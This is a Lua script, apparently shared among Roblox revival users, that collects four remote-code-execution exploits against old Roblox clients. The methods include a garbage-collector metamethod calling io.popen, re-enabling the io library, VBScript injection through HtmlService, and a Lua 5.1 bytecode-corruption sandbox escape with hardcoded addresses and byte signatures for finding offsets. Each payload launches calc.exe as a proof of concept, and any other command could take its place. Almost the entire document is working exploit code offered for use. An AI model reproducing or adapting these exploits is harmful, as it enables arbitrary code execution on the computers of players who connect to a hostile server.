-- null add lua highlighting i need it
-- RCE method 1 for early 2009 and before
getmetatable(newproxy(true)).__gc = function()
print("this runs outside Roblox's sandbox if the revival doesnt patch this")
print("io.popen should also work here on like some clients, example below opens calc")
io.popen("calc.exe")
game:Close()
end
-- RCE 2 for early 2008 and before, most revs know to patch this one
settings().Diagnostics.ioEnabled = true
io.popen("calc.exe")
-- RCE 3 if revival has htmlservice
local w = game:GetService("HtmlService"):NewWindow()
w.DocumentComplete:connect(function()
w:SetBody([==[
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "start calc.exe"
</script>
]==])
w:Show()
end)
w:Navigate()
-- note you need IE 8 compat string in html or smt if using this on modern systems
--RCE 4, anything before io_popen was not compiled in so like before 2010 i think?
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
error("This generator requires a 32-bit version of Lua 5.1")
end
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed
local function middle()
local function f2ii(x) -- Convert double to uint32_t[2]
if x == 0 then return 0, 0 end
if x < 0 then x = -x end
local e_lo, e_hi, e, m = -1075, 1023
while true do
e = (e_lo + e_hi)
e = (e - (e % 2)) / 2
m = x / 2^e
if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end
end
if e+1023 <= 1 then
m = m * 2^(e+1074)
e = 0
else
m = (m - 0.5) * 2^53
e = e + 1022
end
local lo = m % 2^32
m = (m - lo) / 2^32
local hi = m + e * 2^20
return lo, hi
end
local function ii2f(lo, hi) -- Convert uint32_t[2] to double
local m = hi % 2^20
local e = (hi - m) / 2^20
m = m * 2^32 + lo
if e ~= 0 then
m = m + 2^52
else
e = 1
end
return m * 2^(e-1075)
end
local function asnum(x) -- Reinterpret any TValue as a number
for i = x, x, 0 do
return i
end
end
local co, upval
local function inner()
local ub1 = {[0] = -- Convert uint8_t to char[1]
"\0", "\1", "\2", "\3", "\4", "\5", "\6", "\7", "\8", "\9", "\10", "\11", "\12", "\13", "\14",
"\15", "\16", "\17", "\18", "\19", "\20", "\21", "\22", "\23", "\24", "\25", "\26", "\27", "\28",
"\29", "\30", "\31", "\32", "\33", "\34", "\35", "\36", "\37", "\38", "\39", "\40", "\41", "\42",
"\43", "\44", "\45", "\46", "\47", "\48", "\49", "\50", "\51", "\52", "\53", "\54", "\55", "\56",
"\57", "\58", "\59", "\60", "\61", "\62", "\63", "\64", "\65", "\66", "\67", "\68", "\69", "\70",
"\71", "\72", "\73", "\74", "\75", "\76", "\77", "\78", "\79", "\80", "\81", "\82", "\83", "\84",
"\85", "\86", "\87", "\88", "\89", "\90", "\91", "\92", "\93", "\94", "\95", "\96", "\97", "\98",
"\99", "\100", "\101", "\102", "\103", "\104", "\105", "\106", "\107", "\108", "\109", "\110", "\111",
"\112", "\113", "\114", "\115", "\116", "\117", "\118", "\119", "\120", "\121", "\122", "\123", "\124",
"\125", "\126", "\127", "\128", "\129", "\130", "\131", "\132", "\133", "\134", "\135", "\136", "\137",
"\138", "\139", "\140", "\141", "\142", "\143", "\144", "\145", "\146", "\147", "\148", "\149", "\150",
"\151", "\152", "\153", "\154", "\155", "\156", "\157", "\158", "\159", "\160", "\161", "\162", "\163",
"\164", "\165", "\166", "\167", "\168", "\169", "\170", "\171", "\172", "\173", "\174", "\175", "\176",
"\177", "\178", "\179", "\180", "\181", "\182", "\183", "\184", "\185", "\186", "\187", "\188", "\189",
"\190", "\191", "\192", "\193", "\194", "\195", "\196", "\197", "\198", "\199", "\200", "\201", "\202",
"\203", "\204", "\205", "\206", "\207", "\208", "\209", "\210", "\211", "\212", "\213", "\214", "\215",
"\216", "\217", "\218", "\219", "\220", "\221", "\222", "\223", "\224", "\225", "\226", "\227", "\228",
"\229", "\230", "\231", "\232", "\233", "\234", "\235", "\236", "\237", "\238", "\239", "\240", "\241",
"\242", "\243", "\244", "\245", "\246", "\247", "\248", "\249", "\250", "\251", "\252", "\253", "\254",
"\255"}
local function ub4(x) -- Convert little endian uint32_t to char[4]
local b0 = x % 256; x = (x - b0) / 256
local b1 = x % 256; x = (x - b1) / 256
local b2 = x % 256; x = (x - b2) / 256
local b3 = x % 256
return ub1[b0] .. ub1[b1] .. ub1[b2] .. ub1[b3]
end
do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
co = coroutine.wrap(ub4) -- create a CClosure
upval = 2^52 .. ub4(asnum(co) - (2^52 - 12))
local upval_ptr = ub4(asnum(upval) - (2^52 - 16 - 12))
magic = upval_ptr .. upval_ptr
end
--// base is always 0x400000 hex, open ur client thats before august 3 2012 in good ol ida for finding these, or have these AOBs for the lazy fucks out there
--// 53 55 56 8B 74 24 10 57 6A 00 6A 01 56 E8 - io_popen aob
--// 56 57 8B 7C 24 0C 68 ED - luaB_auxwrap aob
local LUAB_AUXWRAP = 0x60aaa0 --// luaB_auxwrap
local IO_POPEN = 0x6062d0 --// io.popen
-- Calculate delta
local delta = IO_POPEN - LUAB_AUXWRAP
local command = "calc.exe"
inner()
local lo, hi = f2ii(asnum(magic))
magic = ii2f(lo, hi + delta)
co(command)
end
middle()
end
outer = string.dump(outer)
:gsub("\96%z%z\128", "\22\0\0\128")
:gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1)
loadstring(outer)()
-- you need to find like 2 offsets in Binja/IDA Pro/Ghidra etc, reference 2016 roblox source leak or smt idk, ios builds before 2019-2020 and 2007L-2008E RBXGS builds also work since debug symbols were shipped
